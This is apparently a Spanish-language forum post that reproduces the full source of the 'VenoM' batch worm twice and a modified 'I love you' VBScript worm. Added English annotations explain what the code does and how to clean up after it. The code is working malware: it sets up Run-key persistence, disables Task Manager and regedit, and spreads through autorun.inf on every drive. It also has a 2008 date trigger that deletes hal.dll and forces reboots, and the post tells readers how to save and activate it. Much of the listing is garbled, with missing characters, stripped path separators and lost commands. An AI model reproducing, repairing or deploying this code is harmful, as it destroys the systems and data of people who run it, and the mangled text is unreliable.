
Código fuente del virus VenoM

Para todos aquellos que les pueda interesar, en este, mi primer post, pueden encontrar
el código fuente del virus. Que conste que hago este aporte con fines educativos, para
analizar de qué manera actúan estos malware y entender su propósito específico.
Advertencia: el código es malicioso y destructivo (entre otras cosas borra hal.dll y deja
Windows sin poder arrancar); manéjelo únicamente dentro de una máquina virtual aislada,
sin red ni unidades extraíbles, y nunca lo ejecute en un equipo de uso real.

Para aquellos que no conocen este nuevo virus, aquí está una breve descripción:
Este virus se manifiesta de la siguiente manera:
* Crea un ejecutable de 181 kb por cada carpeta existente en una unidad de disco o memoria.
* Crea un explorer.exe y un mis documentos.exe de 181 kb.
* Deshabilita las opciones de carpeta y el administrador de tareas.
* Conforme pasa el tiempo empieza a enviar un mensaje de texto que dice:
* El juego a terminado. Tu has sido derrotado por VenoM (Metauro_3@hotmail.com).
* Cambia las propiedades del Explorador de Windows para no poder visualizar los archivos
ocultos y esconde las extensiones de archivos.
* Oculta la carpeta del sistema (Windows) y crea un archivo ejecutable con icono de carpeta
llamado Windows en la unidad del sistema, entre algunas cosas más.
REM ===== Analyst annotation (defensive review) =====
REM Batch worm posted as "VenoM". The code below is byte-identical to the posted listing; only REM lines were added.
REM Handle it only inside an isolated, disposable VM with no network and no removable media.
REM The listing is NOT verbatim-runnable as pasted: the page extraction wrapped several quoted paths onto a second
REM line, and some commands lost their verb (see the notes at the `for` loops). Do not "repair" it; the notes are
REM meant to help locate and remove the artifacts it drops.
REM NOTE: `echo of` (sic) merely prints the word "of"; echo is never switched off, so every command is shown as it runs.
@shift 1
@echo of
REM Logs its own path (%0), the user and a timestamp to %appdata%\desktop.log -- an indicator worth checking.
echo ***Inicia proceso de Micro$oft*** %0 %username% %date% %time% >>"%appdata
%\desktop.log
REM A host named DESKTOP (presumably the author's own machine) gets shorter drive lists that skip E: and F:.
if %COMPUTERNAME%==DESKTOP goto NOT
if '%COMPUTERNAME%== ' goto NOT
REM YU = drive letters that receive autorun.inf + payload; TU = drives whose folders get a decoy .exe (see :ser).
set YU=C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
set TU=F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
goto ini
:NOT
set YU=C,D,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
set TU=G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
:ini
REM %a% is a random number reused below in a registry marker key and a SendTo file name.
set a=%random%
REM Kills Ad-Watch.exe (presumably an anti-spyware real-time monitor) before dropping files.
taskkill /f /im Ad-Watch.exe
REM Persistence, preferred path: copy itself to %Windir%\System\winlogon.exe (note: \System, not \System32 where the
REM real winlogon lives) and register it under HKLM Run as value name "CFTMON.EXE".
copy /y %0 "%Windir%\System\winlogon.exe"
if exist "%Windir%\System\winlogon.exe" goto cop

REM Fallback when the HKLM/%Windir% copy failed (e.g. non-admin user): %appdata%\smss.exe + HKCU Run "CFTMON.EXE".
copy /y %0 "%appdata%\smss.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v CFTMON.EXE /t
REG_SZ /d "%appdata%\smss.exe" /f
:cop
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v CFTMON.EXE /t
REG_SZ /d "%Windir%\System\winlogon.exe" /f
if %COMPUTERNAME%==DESKTOP goto NO
if '%COMPUTERNAME%== ' goto NO
REM Explorer/system policy tampering (all per-user, HKCU): removes Folder Options, disables Task Manager and regedit,
REM hides hidden files (Hidden=2), hides extensions (HideFileExt=1) and protected OS files (ShowSuperHidden=0).
REM Cleanup: delete these values or reset them; they are the "folder options / task manager disabled" symptoms.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v
NoFolderOptions /t REG_DWORD /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\Currentversion\Policies\System" /v
DisableTaskMgr /t reg_dword /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v
DisableRegistryTools /t reg_dword /d "1" /f
REM Writes CheckedValue=1 under ...\Folder\Hidden\SHOWALL; 1 is the stock default, so the intent of this line is unclear.
reg add
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SH
OWALL" /v CheckedValue /t reg_dword /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t
REG_DWORD /d "2" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v
HideFileExt /t REG_DWORD /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v
ShowSuperHidden /t REG_DWORD /d "0" /f
REM Infection marker: HKCU\_VenoM_Software_<random x3>\Virus, value "estas"="infectado". Hunt for "_VenoM_Software_".
reg add "HKCU\_VenoM_Software_%a%%a%%a%\Virus" /v estas /d "infectado"
REM More persistence/lure copies: per-user and "Default User" Startup folders, plus the SendTo folder, using
REM .pif/.scr/.exe names that imitate shortcuts and shared folders ("Men Inicio" = Menú Inicio with the accent lost).
copy /y %0 "%userprofile%\Men Inicio\Programas\Inicio\MS-DOS.pif"
copy /y %0 "%systemdrive%\Docume~1\Default User\Men
Inicio\Programas\Inicio\System.exe"
copy /y %0 "%userprofile%\SendTo\Mis documetos.exe"
copy /y %0 "%userprofile%\SendTo\Disco extraible.pif"
copy /y %0 "%userprofile%\SendTo\Documentos compartidos.scr"
REM Time-bomb check: if the current date contains "2008", jump to the destructive branch (label :Dr; that label is
REM garbled in this listing, but the branch -- delete hal.dll, forced reboots -- appears further down).
cd %userprofile%
date /t>desktop.inf
find "2008" desktop.inf
if errorlevel 0 if not errorlevel 1 goto Dr
:NO
REM Hides the real Windows folder and drops a decoy %systemdrive%\WINDOWS.EXE (the "folder-icon Windows file"),
REM plus copies in system32, the Start Menu, Quick Launch and the RECYCLER folder.
attrib +h %windir%
copy /y %0 "%systemdrive%\WINDOWS.EXE"
copy /y %0 "%windir%\system32\%username% 3D.scr"
copy /y %0 "%userprofile%\Men Inicio\Mis documentos.exe"

copy /y %0 "%userprofile%\Datosd~1\Microsoft\Internet Explorer\Quick Launch\Mis


documentos.exe"
copy /y %0 "%systemdrive%\RECYCLER\Documendos borrados de %username%.exe"
copy /y %0 "%systemdrive%\RECYCLER\Papelera de reciclaje compartida.exe"
REM Builds the autorun.inf template in %userprofile%: open/Open/Explore/find/CMD all point at .\VenoM.666\Explorer.exe.
REM (The section header is written as "[autorun" without the closing bracket in both copies of the listing.)
cd "%userprofile%"
echo [autorun>>autorun.inf
echo open=VenoM.666\Explorer.exe>>autorun.inf
echo shell\Open=>>autorun.inf
echo shell\Open\Command=.\VenoM.666\Explorer.exe>>autorun.inf
echo shell\Explore\=>>autorun.inf
echo shell\Explore\Command=.\VenoM.666\Explorer.exe>>autorun.inf
echo shell\find\=>>autorun.inf
echo shell\find\Command=.\VenoM.666\Explorer.exe>>autorun.inf
echo shell\CMD=Smbolo del sistema>>autorun.inf
echo shell\CMD\Command=.\VenoM.666\Explorer.exe>>autorun.inf
REM Drive infection pass over %YU%: per drive, drop "100% <user>.exe" in the root, replace autorun.inf (+s +h +r +a),
REM create VenoM.666\Explorer.exe (+s +h) and append a log line to %appdata%\desktop.inf.
REM As pasted, "attrib -h -s %0 /y %0 ..." has lost the `copy` verb before each "/y" (compare the copy lines above);
REM the one-line command is also wrapped across several lines by the extraction.
for %%h in (%YU%) do if exist %%h:\*.* attrib -h -s %0 /y %0 "%%h:\100%% %username
%.exe"&attrib -r -a -s -h %%h:\*.inf>Nul /y autorun.inf %%h:\autorun.inf>Nul&attrib +s +h +r
+a %%h:\autorun.inf>Nul&md %%h:\VenoM.666>Nul /y %0 %
%h:\VenoM.666\Explorer.exe>Nul&attrib +s +h %%h:\VenoM.666\*.exe>Nul&attrib +s +h %
%h:\VenoM.666&echo %username%---%date%---%time% in %%h:>>"%appdata
%\desktop.inf"
if %COMPUTERNAME%==DESKTOP goto l
if '%COMPUTERNAME%== ' goto l
REM Writes the "Game Over" taunt to %userprofile%\VenoM.txt, copies it to SendTo as "Game Over <rnd><rnd>.txt"
REM and sends it to the default printer.
cd "%userprofile%"
echo "El juego a terminado. Tu has sido derrotado por VenoM (Metauro_3
@hotmail.com).">VenoM.txt
echo.>>VenoM.txt
echo
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
copy /y VenoM.txt "%userprofile%\SendTo\Game Over %a%%a%.txt"
print VenoM.txt

REM Scheduled tasks: deletes AT jobs 1..24, then schedules VenoM.txt to open interactively at HH:13 for every hour
REM (the hourly message described in the post). Cleanup: `at /delete` and check the Task Scheduler job list.
for /l %%t in (1,1,24) do at %%t /delete


set h=0
:q
at %h%:13 /interactive "%userprofile%\VenoM.txt"
set /a h=%h%+1
if %h%==24 goto l
goto q
:l
REM Resident components: two more self-copies in %appdata% named services.exe and lsass.exe (imitating system
REM processes, but under the user profile). Routing: if running as services.exe -> :ser, as lsass.exe -> :w;
REM any other invocation launches both copies and exits.
if exist "%appdata%\services.exe" goto bl
copy /y %0 "%appdata%\services.exe"
:bl
if exist "%appdata%\lsass.exe" goto oz
copy /y %0 "%appdata%\lsass.exe"
:oz
if %0=="%appdata%\services.exe" goto ser
if %0=="%appdata%\lsass.exe" goto w
"%appdata%\services.exe"
"%appdata%\lsass.exe"
exit
:w
REM Watchdog loop (lsass.exe copy): busy-polls every drive in %YU% and jumps to :d as soon as any drive lacks
REM VenoM.666\Explorer.exe or autorun.inf -- i.e. re-infects media that was cleaned or newly inserted.
cd "%userprofile%"
for %%h in (%YU%) do if exist %%h:\*.* (if not exist "%%h:\VenoM.666\Explorer.exe" goto d )
for %%h in (%YU%) do if exist %%h:\*.* (if not exist "%%h:\autorun.inf" goto d )
goto w
:d
REM Same drive-infection command as above (same missing `copy` verb), then back to the watchdog loop.
cd "%userprofile%"
for %%h in (%YU%) do if exist %%h:\*.* attrib -h -s %0 /y %0 "%%h:\100%% %username
%.exe"&attrib -r -a -s -h %%h:\*.inf /y autorun.inf %%h:\autorun.inf&attrib +s +h +r +a %
%h:\autorun.inf&md %%h:\VenoM.666 /y %0 %%h:\VenoM.666\Explorer.exe&attrib +s +h %
%h:\VenoM.666\*.exe&attrib +s +h %%h:\VenoM.666&echo %username%---%date%---%time
% in %%h:>>"%appdata%\desktop.inf"
goto w

REM ===== Analyst annotation (defensive review; code below is byte-identical to the posted listing) =====
REM This tail of the listing is badly damaged by the page extraction (characters dropped mid-word); the second copy
REM of the listing further down the page is more legible for these lines. Do not try to reconstruct it.
REM Destructive branch (the label before this line, `:Dr`, is lost here; it is the target of the "2008" date check):
REM deletes %windir%\system32\hal.dll (Windows cannot boot without it), drops a VenoM.bat in the Startup folder that
REM forces an immediate reboot, and a VenoM.vbs that shows VBCRITICAL message boxes in a loop whose exit condition
REM (clave = "666") can never be met by a button click, then forces a reboot ("Welcome to Hell" per the second copy).
REM The author's own DESKTOP host is exempted.
if %COMPUTERNAME%==DESKTOP exit
del
/q "%windir%\system32\hal.dll"
cd "%userprofil
\Men Inicio\Programas\Inicio\"
ec
shutdown -r -f -t 00>VenoM.ba
REM Generates VenoM.vbs line by line (echo ... >>VenoM.vbs); `^<^>` is the escaped "<>" operator.
echo OPTION EXPLICIT>VenoM.vbs

echo DIM clave>>VenoM.vbs

echo DO WHILE (clave ^<^> "666"

>>VenoM.vbs

echo clave = msgbox ("", VBCRITICAL, ""

>>VenoM.vbs

echo clave = msgbox ("Maiden Germany", VBCRITICAL, "VenoM 4.2"

>>VenoM.vbs

echo clave = msgbox ("metauro_3 @hotmail.com", VBCRITICAL, "VenoM"

>>VenoM.vbs

echo LOOP>>Veno
vbs
REM Starts the message-box loop and schedules a forced reboot; the fragments below are the mangled `-c "Welcome to Hell"`.
start VenoM.vbs
shutdown -r -f -t 12
c
elcom
to Hel
REM Endless no-op loop that keeps this process alive until the reboot.
:B
echo
goto B

REM Folder-decoy routine (services.exe copy): lists every extensionless entry ("*." = mostly folders) under
REM My Documents and every drive in %TU% into %appdata%\NTUSER.DAT.DLL (a plain-text list despite the name), then
REM calls :V for each path so that a copy of itself is written as "<folder path>.exe" -- the "one executable per
REM folder" symptom from the description. %u% holds the worm's own path.
:ser
cd
%appdata%"
set u=%0
dir "%userprofile%\misdoc~1\*." /b /s >"%ap
ata%\NTUSER.DAT.DLL"
for %%f in (%TU%)
do if exist %%f:\*.* (dir "%%f:\*." /b /s) >>"%ap
ata%\NTUSER.DAT.DLL"
for /f "tokens=* delims= " %%a in (NTUSER.DAT
LL
do call
"%%a"
REM :V -- %1 is one listed path; writes %u% to "<path>.exe". No `goto :eof`, so control falls through after the loop.
:V
set t=%
copy /y
% %t%.exe
Fuentes:
En estas fuentes pueden encontrar la manera de desinfectarse de este virus, para aquellos que se
han visto afectados. Téngase en cuenta que el virus también deshabilita el Administrador de tareas,
el editor del registro y las opciones de carpeta mediante claves de directiva en HKCU, que hay que
revertir además de eliminar los archivos.
http://www.bitslab.net/2007/10/31/como-eliminar-el-virus-venom-m
do-de-desinfeccion/
http://foro.el-hacker.com/index.p
/topic,142797.0.html

Agradecer no cuesta nada.

Códigos fuente de virus informáticos


Primero quiero decir que pongo estos códigos fuente solamente por información, investigación
y prevención; no me hago responsable de lo que hagan con ellos. Nota: la copia que sigue ha perdido
todas las barras invertidas (\) al pegarse, así que las rutas y claves del registro aparecen sin separadores.
Estos Virus se activan de la siguiente manera: copian y pegan el codigo fuente en el bloc de
notas despues lo guardan con extension bat EJ: Garbage.bat.
Codigos Fuente:
Virus Venom:
REM ===== Analyst annotation (defensive review; code below is byte-identical to the posted listing) =====
REM Second paste of the same "VenoM" batch worm. Every backslash was stripped when it was posted, so file paths
REM and registry keys appear without separators (e.g. "%appdata%desktop.log", "HKCUSoftwareMicrosoft...").
REM Do not "repair" it. Its value for a reviewer is that the destructive tail (from the `r` remnant of the
REM :Dr label to :V) is legible here, unlike in the first copy. Handle only inside an isolated, disposable VM.
REM NOTE: `echo of` (sic) just prints "of"; echo stays on.
@shift 1
@echo of
echo ***Inicia proceso de Micro$oft*** %0 %username% %date% %time% >>"%appdata
%desktop.log
if %COMPUTERNAME%==DESKTOP goto NOT
if '%COMPUTERNAME%== ' goto NOT
set YU=C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
set TU=F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
goto ini
:NOT
set YU=C,D,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
set TU=G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
:ini
set a=%random%
taskkill /f /im Ad-Watch.exe
REM Persistence: self-copy as winlogon.exe under %Windir%\System (separator lost) + HKLM Run value "CFTMON.EXE";
REM fallback %appdata%\smss.exe + HKCU Run value "CFTMON.EXE".
copy /y %0 "%Windir%Systemwinlogon.exe"
if exist "%Windir%Systemwinlogon.exe" goto cop

copy /y %0 "%appdata%smss.exe"
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionRun" /v CFTMON.EXE /t REG_SZ /d
"%appdata%smss.exe" /f
:cop
reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun" /v CFTMON.EXE /t REG_SZ /d
"%Windir%Systemwinlogon.exe" /f
if %COMPUTERNAME%==DESKTOP goto NO
if '%COMPUTERNAME%== ' goto NO
REM HKCU policy tampering: NoFolderOptions, DisableTaskMgr, DisableRegistryTools, Hidden=2, HideFileExt=1,
REM ShowSuperHidden=0, plus an infection marker key "_VenoM_Software_<random x3>".
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFolderOptions
/t REG_DWORD /d "1" /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentversionPoliciesSystem" /v DisableTaskMgr /t
reg_dword /d "1" /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v
DisableRegistryTools /t reg_dword /d "1" /f
reg add
"HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWAL
L" /v CheckedValue /t reg_dword /d "1" /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v Hidden /t
REG_DWORD /d "2" /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v HideFileExt /t
REG_DWORD /d "1" /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v
ShowSuperHidden /t REG_DWORD /d "0" /f
reg add "HKCU_VenoM_Software_%a%%a%%a%Virus" /v estas /d "infectado"
copy /y %0 "%userprofile%Men InicioProgramasInicioMS-DOS.pif"
copy /y %0 "%systemdrive%Docume~1Default UserMen InicioProgramasInicioSystem.exe"
copy /y %0 "%userprofile%SendToMis documetos.exe"
copy /y %0 "%userprofile%SendToDisco extraible.pif"
copy /y %0 "%userprofile%SendToDocumentos compartidos.scr"
REM Time bomb: a date containing "2008" jumps to :Dr (the destructive branch below).
cd %userprofile%
date /t>desktop.inf
find "2008" desktop.inf
if errorlevel 0 if not errorlevel 1 goto Dr
:NO
attrib +h %windir%
copy /y %0 "%systemdrive%WINDOWS.EXE"
copy /y %0 "%windir%system32%username% 3D.scr"
copy /y %0 "%userprofile%Men InicioMis documentos.exe"
copy /y %0 "%userprofile%Datosd~1MicrosoftInternet ExplorerQuick LaunchMis

documentos.exe"
copy /y %0 "%systemdrive%RECYCLERDocumendos borrados de %username%.exe"
copy /y %0 "%systemdrive%RECYCLERPapelera de reciclaje compartida.exe"
cd "%userprofile%"
echo [autorun>>autorun.inf
echo open=VenoM.666Explorer.exe>>autorun.inf
echo shellOpen=>>autorun.inf
echo shellOpenCommand=.VenoM.666Explorer.exe>>autorun.inf
echo shellExplore=>>autorun.inf
echo shellExploreCommand=.VenoM.666Explorer.exe>>autorun.inf
echo shellfind=>>autorun.inf
echo shellfindCommand=.VenoM.666Explorer.exe>>autorun.inf
echo shellCMD=Smbolo del sistema>>autorun.inf
echo shellCMDCommand=.VenoM.666Explorer.exe>>autorun.inf
REM Drive infection pass (the `copy` verb before each "/y" is missing in the paste, as in the first copy).
for %%h in (%YU%) do if exist %%h:*.* attrib -h -s %0 /y %0 "%%h:100%% %username
%.exe"&attrib -r -a -s -h %%h:*.inf>Nul /y autorun.inf %%h:autorun.inf>Nul&attrib +s +h +r +a
%%h:autorun.inf>Nul&md %%h:VenoM.666>Nul /y %0 %
%h:VenoM.666Explorer.exe>Nul&attrib +s +h %%h:VenoM.666*.exe>Nul&attrib +s +h %
%h:VenoM.666&echo %username%---%date%---%time% in %%h:>>"%appdata%desktop.inf"
if %COMPUTERNAME%==DESKTOP goto l
if '%COMPUTERNAME%== ' goto l
cd "%userprofile%"
echo "El juego a terminado. Tu has sido derrotado por VenoM (Metauro_3
@hotmail.com).">VenoM.txt
echo.>>VenoM.txt
echo
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
echo >>VenoM.txt
copy /y VenoM.txt "%userprofile%SendToGame Over %a%%a%.txt"
print VenoM.txt
REM Hourly AT jobs (HH:13) that open VenoM.txt interactively.
for /l %%t in (1,1,24) do at %%t /delete
set h=0

:q
at %h%:13 /interactive "%userprofile%VenoM.txt"
set /a h=%h%+1
if %h%==24 goto l
goto q
:l
REM Resident copies in %appdata%: services.exe -> :ser (folder decoys), lsass.exe -> :w (drive re-infection watchdog).
if exist "%appdata%services.exe" goto bl
copy /y %0 "%appdata%services.exe"
:bl
if exist "%appdata%lsass.exe" goto oz
copy /y %0 "%appdata%lsass.exe"
:oz
if %0=="%appdata%services.exe" goto ser
if %0=="%appdata%lsass.exe" goto w
"%appdata%services.exe"
"%appdata%lsass.exe"
exit
:w
cd "%userprofile%"
for %%h in (%YU%) do if exist %%h:*.* (if not exist "%%h:VenoM.666Explorer.exe" goto d )
for %%h in (%YU%) do if exist %%h:*.* (if not exist "%%h:autorun.inf" goto d )
goto w
:d
cd "%userprofile%"
for %%h in (%YU%) do if exist %%h:*.* attrib -h -s %0 /y %0 "%%h:100%% %username
%.exe"&attrib -r -a -s -h %%h:*.inf /y autorun.inf %%h:autorun.inf&attrib +s +h +r +a %
%h:autorun.inf&md %%h:VenoM.666 /y %0 %%h:VenoM.666Explorer.exe&attrib +s +h %
%h:VenoM.666*.exe&attrib +s +h %%h:VenoM.666&echo %username%---%date%---%time%
in %%h:>>"%appdata%desktop.inf"
goto w
REM The lone "r" below is what is left of the ":Dr" label (target of the "2008" check). Destructive branch:
REM deletes hal.dll (system becomes unbootable), drops a Startup VenoM.bat that reboots immediately, generates a
REM VenoM.vbs whose DO WHILE loop waits for clave = "666" (never returned by a message-box button, so it never ends),
REM starts it, and forces a reboot in 120 s with the comment "Welcome to Hell". The author's DESKTOP host is exempt.
r
if %COMPUTERNAME%==DESKTOP exit
del /f /q "%windir%system32hal.dll"
cd "%userprofile%Men InicioProgramasInicio"
echo shutdown -r -f -t 00>VenoM.bat

echo OPTION EXPLICIT>VenoM.vbs


echo DIM clave>>VenoM.vbs
echo DO WHILE (clave ^<^> "666">>VenoM.vbs
echo clave = msgbox ("", VBCRITICAL, "">>VenoM.vbs
echo clave = msgbox ("Maiden Germany", VBCRITICAL, "VenoM 4.2">>VenoM.vbs
echo clave = msgbox ("metauro_3 @hotmail.com", VBCRITICAL, "VenoM">>VenoM.vbs
echo LOOP>>VenoM.vbs
start VenoM.vbs
shutdown -r -f -t 120 -c "Welcome to Hell"
REM Endless no-op loop until the reboot.
:B
echo
goto B
REM services.exe copy: lists extensionless entries ("*.", mostly folders) under My Documents and drives in %TU%
REM into %appdata%\NTUSER.DAT.DLL (a text list), then :V writes a self-copy as "<path>.exe" for each one --
REM the "one executable per folder" symptom. %u% is the worm's own path; :V has no `goto :eof`.
:ser
cd "%appdata%"
set u=%0
dir "%userprofile%misdoc~1*." /b /s >"%appdata%NTUSER.DAT.DLL"
for %%f in (%TU%) do if exist %%f:*.* (dir "%%f:*." /b /s) >>"%appdata%NTUSER.DAT.DLL"
for /f "tokens=* delims= " %%a in (NTUSER.DAT.DLL) do call :V "%%a"
:V
set t=%1
copy /y %u% %t%.exe


Este virus lo tienes que guardar con extension Vbs Ej: I love you.vbs
Codigo Fuente de I love you :
' ===== Analyst annotation (defensive review; code below is byte-identical to the posted listing) =====
' VBScript worm dropped as "i_love_you!.txt.vbs". Handle only inside an isolated VM with no removable media.
' The paste is damaged: path separators were stripped (e.g. winpath & "" & NAME), and several lines near the
' end are cut mid-token. Do not try to reconstruct it; the notes describe what the legible parts do.
'I love internet, your PC and Windows.
'Modified by @kiHack clampclamphack.es.tl
' Every runtime error is silently ignored, so partial failures (locked files, denied registry writes) go unnoticed.
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf
dim text,size
' Double extension ".txt.vbs": with extensions hidden (as the VenoM script above arranges) it shows as a .txt file.
const NAME = "i_love_you!.txt.vbs"
const NAME2 = "i_love_you.txt.vbs"
' autorun.inf payload written to each drive: runs the dropped script through wscript on AutoPlay.
atr = "[autorun]"&vbcrlf&"shellexecute=wscript " & NAME

set fs = createobject("Scripting.FileSystemObject
' Reads its own source text into mysource so it can re-write itself elsewhere (file-based replication).
' check = FSO DriveType of the drive the script is running from (1 = removable); it is never updated later.
set mf = fs.getfile(Wscript.ScriptFullname)
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource & text.readline
mysource=mysource & vbcrlf
loop
' Main loop. Drops a copy into the Windows directory (getspecialfolder(0)); attributes 32 = Archive (writable),
' then 39 = ReadOnly+Hidden+System+Archive so the copy is hidden from default Explorer views.
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "" & NAME)
tf.attributes = 32
set tf=fs.createtextfile(winpath & "" & NAME,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "" & NAME)
tf.attributes = 39
' Spread: every removable (1) or fixed (2) drive except A: gets NAME, an autorun.inf and a second copy NAME2.
' Cleanup: remove these three files from the root of each drive and clear the hidden/system attributes first.
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path & "" & NAME)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path & "" & NAME,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path & "" & NAME)

tf.attributes =39

set tf =fs.getfile(flashdrive.path & "autorun.inf"

tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path & "
torun.inf",2
rue)
tf.write atr

tf.close

set tf =fs.getfile(flashdrive.path & "autorun.inf"

tf.a
ributes=39
'---
set tf=fs.getfile(flashdrive.
th & "" & NAME2)

f.attributes =32
set tf=fs.createtextfile(flashdrive.path &
& NAME2,2,true)

f.write
source
tf.close
end if

next

' Registry writes (lines garbled in the paste): an HKLM entry referencing NAME (presumably a Run-key persistence
' value -- the key name is cut off), an Internet Explorer "Window Title" taunt under HKCU, and HKCR\vbsfile\DefaultIcon
' pointed at shell32.dll so dropped .vbs files show a different icon. Hunt for the IE Window Title string to confirm.
set rg = createobject("WScript.Shell"

rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftW & "" & NAME


rg.reg
write "HKEY_CURRENT_USERSoftwareMicrosoftIn ExplorerMainWindow Title","Stupi
Internet Explorer And Windows 9*/XP/Vista. Buy an A
ivirus!!"
rg.regw
te "HKCRvbsfileDefau
Icon",
hell32.dll,
' Unless launched from a removable drive, sleep 200 s and repeat the whole drop/spread pass forever
' (check never changes, so on a fixed drive this loop is endless and re-infects any newly inserted media).
if check <> 1 then
Wscript.sleep 200000
end if

loop while check<>1

' Only reached when run from removable media. ScriptFullname is a full path and NAME2 a bare file name, so the
' comparison is always true and the "I love you" message boxes are shown; the explorer.exe branch is dead code.
set sd = createobject("Wscript.shell"

if Wscript.ScriptFullname <> NAME2 then


msgbox "I love you forever!" & vbcrlf & "from: Me" & vbcrlf
& vbcrlf & "Send this letter to
riends or loves. It's fun!",,"A letter"
msgbox "Te amo por siempre!" & vbcrlf & "De: Mi" & v
bcrlf & vbcrlf & "Enva esta carta a tus amigos/
ores
Divertido, verdad?",,"Un mensaje"
else
sd.run winpath&"explorer.e
/e,/se

& Wscript.ScriptFullname
end if.
